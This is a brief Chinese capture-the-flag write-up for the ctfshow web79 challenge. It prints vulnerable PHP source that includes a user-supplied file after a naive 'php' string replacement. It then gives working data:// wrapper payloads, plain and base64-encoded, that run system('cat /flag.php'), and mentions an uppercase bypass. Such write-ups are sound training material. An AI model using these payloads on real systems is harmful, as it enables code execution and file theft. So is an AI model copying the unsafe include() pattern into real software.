ctfshow-web79-文件包含-data伪协议

题目源码

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:10:14
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:12:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 

比上一题多使用str_replace函数将参数file中的php换成???

可以使用data://伪协议执行命令

?file=data://text/plain,<?php system('cat /flag.php');?>

直接使用没回显，加上base64进行编码

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcucGhwJyk7Pz4=

也可以使用大写绕过对php的过滤，但是可能会不知道flag的文件名，而且flag.php也有php不好绕过